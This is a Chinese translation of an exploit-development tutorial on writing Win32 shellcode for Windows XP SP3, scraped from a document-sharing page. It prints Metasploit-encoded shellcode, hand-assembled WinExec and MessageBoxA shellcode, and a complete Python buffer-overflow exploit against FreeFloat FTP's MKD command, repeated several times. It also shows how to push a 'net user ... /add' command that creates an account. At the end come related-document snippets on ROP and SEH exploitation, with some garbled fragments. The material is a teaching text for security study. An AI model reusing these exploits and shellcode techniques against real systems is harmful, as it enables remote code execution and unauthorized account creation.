"\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf" "\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93" "\x99\x1c\x3d\x27\xef\x8

Size: px
Start display at page:

Download ""\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf" "\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93" "\x99\x1c\x3d\x27\xef\x8"

Transcription

1 Writing W32 shellcode 译者 :Netfairy 前言 欢迎继续! 以前我们都是用现成的 shellcode, 今天我们将从头开始写我们自己的 shellcode. 这是一个十分有用的练习, 两个原因 : (1) 如果有一个漏洞有严重的空间限制 (2) 理解 ROP( 返回导向编程 ) 的好办法 为了加快速度我决定使用第一部分为 "FreeFloat FTP" 写的漏洞利用框架. 你还需要一个 叫 Arwin 的软件, 他可以在指定 dll 文件找到函数的绝对地址. 下面是所有本节的相关信息 (C 源码和编译版本 ) 利用环境 :Backtrack 5 调试机器 :Windows XP PRO SP3 坏字符 : \x00\x0a\x0d 漏洞软件 : 下载 Arwin+ 源码 :arwin.rar 介绍 开始之前我想先说几件事. 首先我们的写的 shellcode 基于特定的操作系统 ( 我选择 Win XP SP3). 其次需要操作系统 dll 文件没有基地址随机化 (ASLR) 才可行. 再有就是 Google+MSDN 是 你最后的朋友. 最后就是写 win32 shellcode 实际上比听起来更容易, 不要气馁. 我们将要写两个 payload (1) 弹计算器 (2)MessageBox 弹消息框 首先我们需要了解这两个 API 的功能 (1)WinExec (2)MessageBoxA. 先看看用 metasploit 框架生成的 shellcode 长啥样 ( 注意大小 ). 别忘了对 shellcode 编码以避免 坏字符. (1) WinExec: 弹计算器 root@bt:~# msfpayload windows/exec CMD=calc.exe R msfencode -b '\x00\x0a\x0d' -t c [*] x86/shikata_ga_nai succeeded with size 227 (iteration=1) unsigned char buf[] = "\xd9\xec\xd9\x74\x24\xf4\xb8\x28\x1f\x44\xde\x5b\x31\xc9\xb1"

2 "\x33\x31\x43\x17\x83\xeb\xfc\x03\x6b\x0c\xa6\x2b\x97\xda\xaf" "\xd4\x67\x1b\xd0\x5d\x82\x2a\xc2\x3a\xc7\x1f\xd2\x49\x85\x93" "\x99\x1c\x3d\x27\xef\x88\x32\x80\x5a\xef\x7d\x11\x6b\x2f\xd1" "\xd1\xed\xd3\x2b\x06\xce\xea\xe4\x5b\x0f\x2a\x18\x93\x5d\xe3" "\x57\x06\x72\x80\x25\x9b\x73\x46\x22\xa3\x0b\xe3\xf4\x50\xa6" "\xea\x24\xc8\xbd\xa5\xdc\x62\x99\x15\xdd\xa7\xf9\x6a\x94\xcc" "\xca\x19\x27\x05\x03\xe1\x16\x69\xc8\xdc\x97\x64\x10\x18\x1f" "\x97\x67\x52\x5c\x2a\x70\xa1\x1f\xf0\xf5\x34\x87\x73\xad\x9c" "\x36\x57\x28\x56\x34\x1c\x3e\x30\x58\xa3\x93\x4a\x64\x28\x12" "\x9d\xed\x6a\x31\x39\xb6\x29\x58\x18\x12\x9f\x65\x7a\xfa\x40" "\xc0\xf0\xe8\x95\x72\x5b\x66\x6b\xf6\xe1\xcf\x6b\x08\xea\x7f" "\x04\x39\x61\x10\x53\xc6\xa0\x55\xab\x8c\xe9\xff\x24\x49\x78" "\x42\x29\x6a\x56\x80\x54\xe9\x53\x78\xa3\xf1\x11\x7d\xef\xb5" "\xca\x0f\x60\x50\xed\xbc\x81\x71\x8e\x23\x12\x19\x7f\xc6\x92" "\xb8\x7f"; (2) MessageBoxA: 弹出一个标题是 b33f 内容是 Pop the box! 的消息框 msfpayload windows/messagebox TEXT='Pop the box!' TITLE=b33f R msfencode -b '\x00\x0a\x0d' -t c [*] x86/shikata_ga_nai succeeded with size 287 (iteration=1) unsigned char buf[] = "\xb8\xe0\x20\xa7\x98\xdb\xd1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" "\x42\x31\x42\x12\x83\xc2\x04\x03\xa2\x2e\x45\x6d\xfb\xc4\x12" "\x57\x8f\x3e\xd1\x59\xbd\x8d\x6e\xab\x88\x96\x1b\xba\x3a\xdc" "\x6a\x31\xb1\x94\x8e\xc2\x83\x50\x24\xaa\x2b\xea\x0c\x6b\x64" "\xf4\x05\x78\x23\x05\x37\x81\x32\x65\x3c\x12\x90\x42\xc9\xae" "\xe4\x01\x99\x18\x6c\x17\xc8\xd2\xc6\x0f\x87\xbf\xf6\x2e\x7c" "\xdc\xc2\x79\x09\x17\xa1\x7b\xe3\x69\x4a\x4a\x3b\x75\x18\x29" "\x7b\xf2\x67\xf3\xb3\xf6\x66\x34\xa0\xfd\x53\xc6\x13\xd6\xd6" "\xd7\xd7\x7c\x3c\x19\x03\xe6\xb7\x15\x98\x6c\x9d\x39\x1f\x98" "\xaa\x46\x94\x5f\x44\xcf\xee\x7b\x88\xb1\x2d\x31\xb8\x18\x66" "\xbf\x5d\xd3\x44\xa8\x13\xaa\x46\xc5\x79\xdb\xc8\xea\x82\xe4" "\x7e\x51\x78\xa0\xff\x82\x62\xa5\x78\x2e\x46\x18\x6f\xc1\x79" "\x63\x90\x57\xc0\x94\x07\x04\xa6\x84\x96\xbc\x05\xf7\x36\x59" "\x01\x82\x35\xc4\xa3\xe4\xe6\x22\x49\x7c\xf0\x7d\xb2\x2b\xf9" "\x08\x8e\x84\xba\xa3\xac\x68\x01\x34\xac\x56\x2b\xd3\xad\x69" "\x34\xdc\x45\xce\xeb\x03\xb5\x86\x89\x70\x86\x30\x7f\xac\x60" "\xe0\x5b\x56\xf9\xfa\xcc\x0e\xd9\xdc\x2c\xc7\x7b\x72\x55\x36" "\x13\xf8\xcd\x5d\xc3\x68\x5e\xf1\x73\x49\x6f\xc4\xfb\xc5\xab" "\xda\x72\x34\x82\x30\xd6\xe4\xb4\xe6\x29\xda\x06\xc7\x85\x24" "\x3d\xcf"; 你可以试试上面的 payload 是否工作. 译者注 : 用 _asm{ lea eax,shellcode; jmp eax;} 测试

3 是时候开始写我们自己的 shellcode 了. Exploit 框架 我决定用 "FreeFloat FTP" 验证我们编写的 shellcode. 这个软件我们在第一部分曾写过漏洞利 用程序. 首先我们看看这个软件的漏洞利用框架, 之前写的漏洞利用程序在下面 : #!/usr/bin/python # Exploit: FreeFloat FTP (MKD BOF) # # OS: WinXP PRO SP3 # # Author: b33f (Ruben Boonen) # # Software: # import socket import sys shellcode = ( ) # Badchars: \x00\x0a\x0d # # 0x77c35459 : push esp # ret msvcrt.dll # # shellcode at ESP => space 749-bytes # buffer = "\x90"*20 + shellcode evil = "A"*247 + "\x59\x54\xc3\x77" + buffer + "C"*(749-len(buffer)) s=socket.socket(socket.af_inet,socket.sock_stream) connect=s.connect((' ',21)) s.send('user anonymous\r\n') s.send('pass anonymous\r\n') s.send('mkd ' + evil + '\r\n') s.send('quit\r\n') s.close 我们用这个框架验证接下来编写的 shellcode. 只需要把我们写的 shellcode 放到 shellcode 变

4 量即可. 下图可以看到控制 EIP 后执行到 nop( 也就是 shellcode). ASM && Opcode 编写 shellcode 必须要处理汇编和机器码 ( 汇编指令的十六机制表示 ). 你需要了解汇编的基本 知识 (push, pop,mov,xor, 等等 ), 毫无疑问, shellcode 是用机器码写的, 可能你会问我怎么知 道某条汇编指令的机器码是什么. 我会告诉你答案. 如果你在调试器某条指令下断, immunity 提供了编辑指令功能. 很多时候 immunity 就像是字典. 下面的截图就是把汇编指令翻译为相对应的机器码.

5 WinExec 写 WinExec 的 shellcode 之前, 我们需要了解这个函数, 它的参数. 你可以查阅 MSDN 得到相关信息. WinExec:MSDN 仔细看看这个函数的信息, WinExec 结构很简单, 包含三个参数 ( 实际上是两个参数 ): Structure: Parameters: UINT WINAPI WinExec( => 指向 kernel32.dll 的 WinExec 指针 ); in LPCSTR lpcmdline, => ASCII 字符串 calc.exe in UINT ucmdshow => 0x (SW_SHOWNORMAL) 让我们看下第一个参数. 第一个参数是指向 WinExec 的指针, arwin 可以帮助我们在没有 aslr 的 WINXP 找到这个指针. 在调试机器用终端打开 arwin, 执行下面的命令 : arwin.exe kernel32.dll WinExec 接下来就是如何把 ASCII 字符串 ( 在这个例子就是我们想要执行的命令 ) 写入堆栈. 第一次做 可能会有点困惑, 实际上并不难. 最好的理解方式是通过一个例子 : ASCII Text: ASCII Text: calc.exe abcdefghijkl

6 Split Text into groups of 4 characters: "calc" ".exe" Split Text into groups of 4 characters: "abcd" "efgh" "ijkl" Reverse the order of the character groups: groups: ".exe" "calc" Reverse the order of the character "ijkl" "efgh" "abcd" Look on google for a ASCII to hex converter converter and convert each character while maintaining maintaining the order: "\x2e\x65\x78\x65" "\x63\x61\x6c\x63" Look on google for a ASCII to hex and convert each character while the order: "\x69\x6a\x6b\x6c" "\x65\x66\x67\x68" "\x61\x62\x63\x64" To write these values to the stack simply add To write these values to the stack simply add "\x68" infront of each group: "\x68" infront of each group: "\x68\x2e\x65\x78\x65" => PUSH ".exe" "\x68\x69\x6a\x6b\x6c" => PUSH "ijkl" "\x68\x63\x61\x6c\x63" => PUSH "calc" "\x68\x65\x66\x67\x68" => PUSH "efgh" "\x68\x61\x62\x63\x64" => PUSH "abcd" 这看来非常直截了当, 你可能注意到了我们的 ASCII 字符串是 4 字节对齐. 如果不是 4 字节 对齐会怎么样呢? 有相当多的办法处理这个问题, 我建议你读 corelanc0d3r 写的这篇文章. 通过扩展的阅读你能学到更多知识. 我会介绍其中一项技术, 看下面 ASCII Text: net user b33f 1234 /add Split Text into groups of 4 characters: "net " "user" " b33" "f 12" "34 /" "add"

7 可以看到 add 没有 4 字节对齐, 非常简单, 在它后面增加一个空格字符就可以了 "add " => "\x68\x61\x64\x64\x20" => PUSH "add " "34 /" => "\x68\x33\x34\x20\x2f" => PUSH "34 /" "f 12" => "\x68\x66\x20\x31\x32" => PUSH "f 12" " b33" => "\x68\x20\x62\x33\x33" => PUSH " b33" "user" => "\x68\x75\x73\x65\x72" => PUSH "user" "net " => "\x68\x6e\x65\x74\x20" => PUSH "net " 最后我们需要 push 1 到堆栈, 这是 WinExec 的 ucmdshow 参数. 如果你不知道机器指令对应的机器码, 在调试里面打上 push 1 就可以看到了. ucmdshow 需要设置为 0x 这有很多方式可以做到, 发挥你的想象力. 我们这样做 : PUSH 1 => "\x6a\x01" (ASCII "1" = "\x31") (*) 另外一种思路, 这样也可以 xor eax,eax (eax 清 0) inc eax (eax 加 1) push eax ( 把 eax 的值压栈 ) 综合 我们把这三个参数按照 MSDN 说明的顺序放到堆栈. 我两点需要注意 :(1) 由于栈是往地地址增长, 所以我们把最后一个参数先压栈 (2) lpcmdline 是我们要执行的命令字符串, 但 WinExec 需要的参数是指向命令字符串的指针. 下面这么做是错的 : "\x68\x2e\x65\x78\x65" => PUSH ".exe" \ Push The ASCII string to the stack "\x68\x63\x61\x6c\x63" => PUSH "calc" / "\x8b\xc4" => MOV EAX,ESP Put a pointer to the ASCII string in EAX "\x6a\x01" => PUSH 1 Push ucmdshow parameter to the stack "\x50" => PUSH EAX Push the pointer to lpcmdline to the stack "\xbb\xed\x2a\x86\x7c" => MOV EBX,7C862AED Move the pointer to WinExec() into EBX "\xff\xd3" => CALL EBX Call WinExec() 上面这么做并不能成功. 我们看看执行这些指令会发生什么.

8 非常接近成功了, 但是注意到但 WinExec 使用 lpcmdline 参数的时候它不知道参数在哪结束. 我们知道 ASCII 字符串是以 \x00 结束的, 因此我们要给 lpcmdline \x00 结束符. 如下所示 这才是正确的方式 : We need "calc.exe" + "\x00"'s but we know that null-bytes are badcharacters however we can easily xor a register (which will then contain 4 null-bytes) and push it to the stack just before we push calc.exe. "\x33\xc0" => XOR EAX,EAX Zero out EAX register "\x50" => PUSH EAX Push EAX to have null-byte padding for "calc.exe" "\x68\x2e\x65\x78\x65" => PUSH ".exe" \ Push The ASCII string to the stack "\x68\x63\x61\x6c\x63" => PUSH "calc" / "\x8b\xc4" => MOV EAX,ESP Put a pointer to the ASCII string in EAX "\x6a\x01" => PUSH 1 Push ucmdshow parameter to the stack "\x50" => PUSH EAX Push the pointer to lpcmdline to the stack "\xbb\xed\x2a\x86\x7c" => MOV EBX,7C862AED Move the pointer to WinExec() into EBX "\xff\xd3" => CALL EBX Call WinExec() 这应该足够了! 从下图可以看到参数布局是正确的. 执行这个代码将会弹出一个计算器.

9 #!/usr/bin/python # Exploit: FreeFloat FTP (MKD BOF) # # OS: WinXP PRO SP3 # # Author: b33f (Ruben Boonen) # # Software: # import socket import sys # (*) WinExec # # (*) arwin.exe => Kernel32.dll - WinExec 0x7C862AED # # (*) MSDN Structure: # # # # UINT WINAPI WinExec( => PTR to WinExec # # in LPCSTR lpcmdline, => calc.exe # # in UINT ucmdshow => 0x1 # # ); # # # # Final Size => 26-bytes (metasploit version size => 227-bytes) # WinExec = ( "\x33\xc0" # XOR EAX,EAX "\x50" # PUSH EAX => padding for lpcmdline "\x68\x2e\x65\x78\x65" # PUSH ".exe" "\x68\x63\x61\x6c\x63" "\x8b\xc4" # PUSH "calc" # MOV EAX,ESP

10 "\x6a\x01" # PUSH 1 "\x50" # PUSH EAX "\xbb\xed\x2a\x86\x7c" # MOV EBX,kernel32.WinExec "\xff\xd3") # CALL EBX # Badchars: \x00\x0a\x0d # # 0x77c35459 : push esp # ret msvcrt.dll # # shellcode at ESP => space 749-bytes # buffer = "\x90"*20 + WinExec evil = "A"*247 + "\x59\x54\xc3\x77" + buffer + "C"*(749-len(buffer)) s=socket.socket(socket.af_inet,socket.sock_stream) connect=s.connect((' ',21)) s.send('user anonymous\r\n') s.send('pass anonymous\r\n') s.send('mkd ' + evil + '\r\n') s.send('quit\r\n') s.close (2) MessageBoxA 接下来写 MessageBoxA shellcode, 先看看这个函数的参数. MessageBoxA:MSDN Structure: Parameters: int WINAPI MessageBox( => user32.dll 的 MessageBoxA 地址 in_opt HWND hwnd, => 0x (NULL = No Window Owner) in_opt LPCTSTR lptext, => 指向 "Pop the box!" in_opt LPCTSTR lpcaption, => 指向 "b33f" in UINT utype => 0x (MB_OK MB_APPLMODAL) 看起来有点复杂, 但是没有什么不能解决的. 和前面不同的是这里有两个 ASCII 字符串需要处理. 先用 arwin 在 user32.dll 找到 MessageBoxA 的地址 arwin.exe user32.dll MessageBoxA

11 好的, 像之前一样布置字符串如下.: ASCII Text: b33f ASCII Text: Pop the box! Split Text into groups of 4 characters: Split Text into groups of 4 characters: "b33f" "Pop " "the " "box!" Reverse the order of the character groups: groups: "b33f" Reverse the order of the character "box!" "the " "Pop " Look on google for a ASCII to hex converter converter and convert each character while maintaining maintaining the order: "\x62\x33\x33\x66" Look on google for a ASCII to hex and convert each character while the order: "\x62\x6f\x78\x21" "\x74\x68\x65\x20" "\x50\x6f\x70\x20" To write these values to the stack simply add simply add "\x68" infront of each group: To write these values to the stack "\x68" infront of each group: "\x68\x62\x33\x33\x66" => PUSH "b33f" "\x68\x62\x6f\x78\x21" => PUSH "box!" PUSH "the " PUSH "Pop " "\x68\x74\x68\x65\x20" => "\x68\x50\x6f\x70\x20" => 还有两个参数 :hwnd 和 utype. 这两个参数都设置为 0x 就好了, 很方便, 通过异或 一个寄存器就可以. 反正我们之前也是要异或寄存器得到 \x00 作为 ASCII 字符串结束符. 这是我写的 shellcode( 当然, 你可以写你自己的正确的方法 :

12 "\x33\xc0" => XOR EAX,EAX Zero out EAX register "\x50" => PUSH EAX Push EAX to have null-byte padding for "b33f" "\x68\x62\x33\x33\x66" => PUSH "b33f" Push The ASCII string to the stack "\x8b\xcc" => MOV ECX,ESP Put a pointer to lpcaption string in ECX "\x50" => PUSH EAX Push EAX to have null-byte padding for "Pop the box!" "\x68\x62\x6f\x78\x21" => PUSH "box!" \ "\x68\x74\x68\x65\x20" => PUSH "the " Push The ASCII string to the stack "\x68\x50\x6f\x70\x20" => PUSH "Pop " / "\x8b\xd4" => MOV EDX,ESP Put a pointer to lptext string in EDX "\x50" => PUSH EAX Push utype=0x "\x51" => PUSH ECX Push lpcaption "\x52" => PUSH EDX Push lptext "\x50" => PUSH EAX Push hwnd=0x "\xbe\xea\x07\x45\x7e" => MOV ESI,7E4507EA Move the pointer to MessageBoxA() into ESI "\xff\xd6" => CALL ESI Call MessageBoxA() ) 看下面的截图, 参数显示正确, 继续运行将会弹出一个消息框. #!/usr/bin/python # Exploit: FreeFloat FTP (MKD BOF) # # OS: WinXP PRO SP3 #

13 # Author: b33f (Ruben Boonen) # # Software: # # This exploit was created for Part 6 of my Exploit Development tutorial # # series - # import socket import sys # (*) WinExec # # (*) arwin.exe => Kernel32.dll - WinExec 0x7C862AED # # (*) MSDN Structure: # # # # UINT WINAPI WinExec( => PTR to WinExec # # in LPCSTR lpcmdline, => calc.exe # # in UINT ucmdshow => 0x1 # # ); # # # # Final Size => 26-bytes (metasploit version size => 227-bytes) # WinExec = ( "\x33\xc0" # XOR EAX,EAX "\x50" # PUSH EAX => padding for lpcmdline "\x68\x2e\x65\x78\x65" "\x68\x63\x61\x6c\x63" # PUSH ".exe" # PUSH "calc" "\x8b\xc4" # MOV EAX,ESP "\x6a\x01" # PUSH 1 "\x50" "\xbb\xed\x2a\x86\x7c" "\xff\xd3") # PUSH EAX # CALL EBX # MOV EBX,kernel32.WinExec # (*) MessageBoxA # # (*) arwin.exe => user32.dll - MessageBoxA 0x7E4507EA # # (*) MSDN Structure: # # # # int WINAPI MessageBox( => PTR to MessageBoxA # # in_opt HWND hwnd, => 0x0 # # in_opt LPCTSTR lptext, => Pop the box! # # in_opt LPCTSTR lpcaption, => b33f # # in UINT utype => 0x0 # # ); #

14 # # # Final Size => 39-bytes (metasploit version size => 287-bytes) # MessageBoxA = ( "\x33\xc0" # XOR EAX,EAX "\x50" # PUSH EAX => padding for lpcaption "\x68\x62\x33\x33\x66" # PUSH "b33f" "\x8b\xcc" # MOV ECX,ESP => PTR to lpcaption "\x50" # PUSH EAX => padding for lptext "\x68\x62\x6f\x78\x21" # PUSH "box!" "\x68\x74\x68\x65\x20" # PUSH "the " "\x68\x50\x6f\x70\x20" # PUSH "Pop " "\x8b\xd4" # MOV EDX,ESP => PTR to lptext "\x50" # PUSH EAX - utype=0x0 "\x51" "\x52" "\x50" "\xbe\xea\x07\x45\x7e" "\xff\xd6") # PUSH ECX - lpcaption # PUSH EDX - lptext # PUSH EAX - hwnd=0x0 # MOV ESI,USER32.MessageBoxA # CALL ESI # Badchars: \x00\x0a\x0d # # 0x77c35459 : push esp # ret msvcrt.dll # # shellcode at ESP => space 749-bytes # buffer = "\x90"*20 + MessageBoxA evil = "A"*247 + "\x59\x54\xc3\x77" + buffer + "C"*(749-len(buffer)) s=socket.socket(socket.af_inet,socket.sock_stream) connect=s.connect((' ',21)) s.send('user anonymous\r\n') s.send('pass anonymous\r\n') s.send('mkd ' + evil + '\r\n') s.send('quit\r\n') s.close

15 原文链接 :

ROP_bamboofox.key

ROP_bamboofox.key ROP Return Oriented Programming Lays @ BambooFox Who Am I Lays / L4ys / 累死 - l4ys.tw Reverse Engineering BambooFox / HITCON Outline Buffer Overflow ret2libc / ret2text Return Oriented Programming Payload

More information

#!/usr/bin/python -w filename="evil.plf" buffer = "A"*2000 textfile = open(filename, 'w') textfile.write(buffer) textfile.close() 创建 plf 文件, 用 immunit

#!/usr/bin/python -w filename=evil.plf buffer = A*2000 textfile = open(filename, 'w') textfile.write(buffer) textfile.close() 创建 plf 文件, 用 immunit 结构化异常处理 (SEH) 译者 :Netfairy 前言 这一节介绍漏洞利用中你会遇到的真正障碍. SEH 用于缓解缓冲区攻击造成的问题. 但它也 是有缺陷的. 先说明本文不会讨论 SafeSeh 或者 SEHOP, 稍后的 Part 3b 会解决这些保护机制. 我将用 DVD X Player 5.5 PRO 演示 SEH 利用. 已有的漏洞利用程序 : 这里 通常情况下漏洞利用之前我们需要先分析程序的坏字符,

More information

返回导向编程 (ROP) 译者 :Netfairty 前言 欢迎来到第七部分, 经过前面的学习, 可能你想做一些更有挑战性的事. 好的, 本节我们将 要学习的是 ROP( 返回导向编程 ). 不像前一节我们把参数精心布置在堆栈然后调用 Windwos API 去执行它们. 所有介绍 ROP 教程都需

返回导向编程 (ROP) 译者 :Netfairty 前言 欢迎来到第七部分, 经过前面的学习, 可能你想做一些更有挑战性的事. 好的, 本节我们将 要学习的是 ROP( 返回导向编程 ). 不像前一节我们把参数精心布置在堆栈然后调用 Windwos API 去执行它们. 所有介绍 ROP 教程都需 返回导向编程 (ROP) 译者 :Netfairty 前言 欢迎来到第七部分, 经过前面的学习, 可能你想做一些更有挑战性的事. 好的, 本节我们将 要学习的是 ROP( 返回导向编程 ). 不像前一节我们把参数精心布置在堆栈然后调用 Windwos API 去执行它们. 所有介绍 ROP 教程都需要你做很多的工作才能掌握它. 但是在次提醒本教 程不会覆盖 ROP 所有细节. 如果你想更好的理解 ROP

More information

上面的介绍会使我们的漏洞利用更清晰. 再次说明这篇教程不会覆盖所有的系列, 你还需要 做更多的研究. 好吧, 开始我们的旅途! 重现崩溃 是时候崩溃了 "Triologic Media Player 8". 这将是另一个文件格式的漏洞. 下面是 POC 和崩溃的截图, 你只需载入 evil.m3u

上面的介绍会使我们的漏洞利用更清晰. 再次说明这篇教程不会覆盖所有的系列, 你还需要 做更多的研究. 好吧, 开始我们的旅途! 重现崩溃 是时候崩溃了 Triologic Media Player 8. 这将是另一个文件格式的漏洞. 下面是 POC 和崩溃的截图, 你只需载入 evil.m3u Unicode 0x00410041 译者 :Netfairy 前言 欢迎来到漏洞利用系列教程第五部分. 注意到前面的难度逐渐递增并且都是建立在彼此的 基础上的. 这部分有点不一样, 是时候提高游戏难度, 杀死 unicode 这个怪物! 这部分教给你 两个宝贵的经验 :(1) 生活给屎黄金涂上了柠檬油漆 (2) 更加努力我将用 "Triologic Media Player 8" 演示 unicode

More information

Microsoft Word - CIN-DLL.doc

Microsoft Word - CIN-DLL.doc 6.3. 调 用 动 态 链 接 库 (DLL) 相 对 于 CIN 来 讲,NI 更 推 荐 用 户 使 用 DLL 来 共 享 基 于 文 本 编 程 语 言 开 发 的 代 码 除 了 共 享 或 重 复 利 用 代 码, 开 发 人 员 还 能 利 用 DLL 封 装 软 件 的 功 能 模 块, 以 便 这 些 模 块 能 被 不 同 开 发 工 具 利 用 在 LabVIEW 中 使 用

More information

Linux kernel exploit研究和探索

Linux kernel exploit研究和探索 Linux kernel exploit DOC alert7 PPT e4gle 2002-12-2 1 2002-12-2 2 Linux kernel exploit kernel exploit exploit exploit exploit (Kernel Buffer Overflow) (Kernel

More information

漏 洞 攻 防 EXPLOIT ATTACK & DEFENCE 栏 目 编 辑 脚 本 小 子 scriptsboy@hacker.com.cn HEAD 部 分 大 小 当 然 也 就 是 固 定 的 18200H 如 果 要 提 取 出 HEAD, 我 们 可 以 选 中 前 18200H 字

漏 洞 攻 防 EXPLOIT ATTACK & DEFENCE 栏 目 编 辑 脚 本 小 子 scriptsboy@hacker.com.cn HEAD 部 分 大 小 当 然 也 就 是 固 定 的 18200H 如 果 要 提 取 出 HEAD, 我 们 可 以 选 中 前 18200H 字 适 合 读 者 : 入 侵 爱 好 者 溢 出 爱 好 者 前 置 知 识 : 汇 编 语 言 缓 冲 区 溢 出 基 本 原 理 文 / 图 何 永 强 Word 畸 形 数 据 结 构 溢 出 漏 洞 分 析 与 利 用 以 前 都 是 写 远 程 溢 出 漏 洞, 感 觉 也 该 换 换 口 味 了 事 实 上,2005 年 以 来 的 远 程 溢 出 漏 洞, 如 MS05-039 MS06-040

More information

CPU : i3 RAM: 2G Win2000 Windows XP Windows Vista Windows 7 Cable ADSL 1. [ ] 2., 1. 2. KGI [ ] 3. 4. 5. 6. 7. / /KGI /, 1. (1) / (2) - Proxy, Proxy IP Port (3) - a. / / b. (4) - (5) / / / / / (6) -,,

More information

今天刚发现的, 比较简单, 于是就来简单分析下吧 该感染样本很简单, 新加了个区段放病毒执行代码, 执行病毒代码, 最后跳回原入口点来执行原文件 下面就是感染后的代码的简单分析 : ; =============== S U B R O U T I N E =====================

今天刚发现的, 比较简单, 于是就来简单分析下吧 该感染样本很简单, 新加了个区段放病毒执行代码, 执行病毒代码, 最后跳回原入口点来执行原文件 下面就是感染后的代码的简单分析 : ; =============== S U B R O U T I N E ===================== 吾爱破解论坛 [LCG] [LSG] 立足软件安全和病毒分析最前端, 丰富的技术版块交相辉映, 由无数加密解密及反病毒爱好者共同维护, 留给世界一抹值得百年回眸的惊 艳, 沉淀百年来计算机应用之精华与优雅, 信息线条与生活质感淡定交融, 任岁月流转, 低调而奢华的技术交流与研究却是亘古不变 标题 : 一个感染样本的简单分析 作者 :ximo 今天刚发现的, 比较简单, 于是就来简单分析下吧 该感染样本很简单,

More information

int *p int a 0x00C7 0x00C7 0x00C int I[2], *pi = &I[0]; pi++; char C[2], *pc = &C[0]; pc++; float F[2], *pf = &F[0]; pf++;

int *p int a 0x00C7 0x00C7 0x00C int I[2], *pi = &I[0]; pi++; char C[2], *pc = &C[0]; pc++; float F[2], *pf = &F[0]; pf++; Memory & Pointer trio@seu.edu.cn 2.1 2.1.1 1 int *p int a 0x00C7 0x00C7 0x00C7 2.1.2 2 int I[2], *pi = &I[0]; pi++; char C[2], *pc = &C[0]; pc++; float F[2], *pf = &F[0]; pf++; 2.1.3 1. 2. 3. 3 int A,

More information

bingdian001.com

bingdian001.com 1. DLL(Dynamic Linkable Library) DLL ± lib EXE DLL DLL EXE EXE ± EXE DLL 1 DLL DLL DLL Windows DLL Windows API Visual Basic Visual C++ Delphi 2 Windows system32 kernel32.dll user32.dll gdi32.dll windows

More information

概述

概述 OPC Version 1.6 build 0910 KOSRDK Knight OPC Server Rapid Development Toolkits Knight Workgroup, eehoo Technology 2002-9 OPC 1...4 2 API...5 2.1...5 2.2...5 2.2.1 KOS_Init...5 2.2.2 KOS_InitB...5 2.2.3

More information

Microsoft PowerPoint - XCon2010_win7_cn.ppt [兼容模式]

Microsoft PowerPoint - XCon2010_win7_cn.ppt [兼容模式] 绕过 windows 7 浏览器内存保护 Chen XiaoBo Xiao_Chen@McAfee.com Xie Jun Jun_Xie@McAfee.com com Windows 保护机制回顾 GS Stack cookies 防止覆盖 EIP 可以通过覆盖 SEH chains 来绕过 /GS 保护 SafeSEH & SEHOP SEH handler 验证 可以通过已注册的 SEH handler

More information

,768 32,767 32K JMP Jnnn (386+) LOOP CALL [Label:] JMP short/near/far address L10: jmp jmp L20: L10 L20

,768 32,767 32K JMP Jnnn (386+) LOOP CALL [Label:] JMP short/near/far address L10: jmp jmp L20: L10 L20 (Jump) (Loop) (Conditional jump) CMP CALL AND SAR/SHR TEST JMP NOT SAL/SHL Jnnn* OR RCR/ROR LOOP XOR RCL/ROL RETn * nnn, JNE JL -128 127-32,768 32,767 32K JMP Jnnn (386+) LOOP CALL [Label:] JMP short/near/far

More information

06721 main() lock pick proc() restart() [2][4] MINIX minix2.0 GDT, IDT irq table[] CPU CPU CPU CPU (IDTR) idt[] CPU _hwint00:! Interrupt

06721 main() lock pick proc() restart() [2][4] MINIX minix2.0 GDT, IDT irq table[] CPU CPU CPU CPU (IDTR) idt[] CPU _hwint00:! Interrupt MINIX ( 730000) ( 730000) MINIX MINIX2.0 MINIX : MINIX TP3 1 MINIX UNIX Tanenbaum UNIX MINIX LINUX MINIX MINIX MINIX1.0 UNIX V7 MINIX2.0[3] POSIX MINIX3 MINIX Gabriel A. Wainer 1994-1995 [5] 1998 I/O 2002

More information

目 录

目 录 1 Quick51...1 1.1 SmartSOPC Quick51...1 1.2 Quick51...1 1.3 Quick51...2 2 Keil C51 Quick51...4 2.1 Keil C51...4 2.2 Keil C51...4 2.3 1 Keil C51...4 2.4 Flash Magic...9 2.5 ISP...9 2.6...10 2.7 Keil C51...12

More information

学习MSP430单片机推荐参考书

学习MSP430单片机推荐参考书 MSP430 16 MSP430 C MSP430 C MSP430 FLASH 16 1 CPU 16 ALU 16 PC SP SR R4~R15 2 3 00-FFH 100-1FFH 4 5 1 2 51 24 27 6 1 2 3 4 5 6 4 12 SR SP SR CPU SR CPU C Z N GIE CPUOff CPU OscOff SCG0 SCG1 CPU EXIT SP

More information

且编写我们的利用程序, 到最后, 会简单讲一下, 这个漏洞的修补. 首先我们来了解下溢出产生的原因. 打开 windbg, 附加到 msue 进程上, 然后在 kernel!readfile 处下断点, 再用 muse 打开我们之前做好的 test.m3u( 注 : 在这个过程中, 会多次断在 Re

且编写我们的利用程序, 到最后, 会简单讲一下, 这个漏洞的修补. 首先我们来了解下溢出产生的原因. 打开 windbg, 附加到 msue 进程上, 然后在 kernel!readfile 处下断点, 再用 muse 打开我们之前做好的 test.m3u( 注 : 在这个过程中, 会多次断在 Re MUSE v4.9.0.006 (.m3u) 本地溢出漏洞的分析和利用 文 : 冰雪风谷文件格式溢出漏洞一直是黑客门攻击的热点, 从暴风影音播放器到 qq 播放器以及其它的各种播放器, 都被人暴过相关的漏洞. 至于造成漏洞的原因, 大部分是由于往栈里拷贝字符的时候, 没有检查字符串的长度, 导致拷贝的长度大于缓冲区的长度, 于是造成了溢出. 当然, 还有部分是整数溢出, 出现在一些有无符号数混合使用,

More information

<4D6963726F736F667420576F7264202D203230313330383136D6D0B9FAB5D8D6CAB4F3D1A7BFC6D1D0BEADB7D1D3D0B9D8D6C6B6C82D48442E646F63>

